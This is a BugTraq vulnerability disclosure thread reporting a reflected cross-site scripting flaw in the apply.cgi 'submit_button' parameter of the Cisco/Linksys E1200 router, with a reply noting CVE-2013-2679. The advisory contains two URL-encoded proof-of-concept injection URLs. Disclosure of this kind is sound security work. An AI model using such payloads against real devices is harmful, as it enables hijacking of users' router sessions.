BugTraq
Cisco/Linksys E1200 N300 Reflected XSS Apr 29 2013 07:27AM
Carl Benedict (theinfinitenigma gmail com) (1 replies)
Re: Cisco/Linksys E1200 N300 Reflected XSS Jul 10 2013 02:44AM
the infinitenigma (theinfinitenigma gmail com)
Mitre has assigned the following CVE for this issue:

CVE-2013-2679

On Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict
<theinfinitenigma (at) gmail (dot) com [email concealed]> wrote:
> Summary
> --------------------
> Software : Cisco/Linksys Router OS
> Hardware : E1200 N300 (others currently untested)
> Version : 2.0.04 (others currently untested)
> Website : http://www.linksys.com
> Issue : Reflected XSS
> Severity : Medium
> Researcher: Carl Benedict (theinfinitenigma)
>
> Product Description
> --------------------
> The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch.
>
> Details
> --------------------
> The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful.
>
> Sample URL #1 (HTTP GET request):
>
> http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Csc
ript%3Ealert%281%29%3C%2fscript%3E%20%27
>
> Sample URL #2 (HTTP GET request):
>
> http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72
%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63
%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto
=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_rebo
ot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan
_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_dem
and_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_ho
stname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_i
paddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco100
02&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=
0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1
_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wa
n_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=
0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1
>
> History
> --------------------
> 04/26/2013 : Discovery
> 04/27/2013 : Advisory released
>
>
> --
> â??

--
â??

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus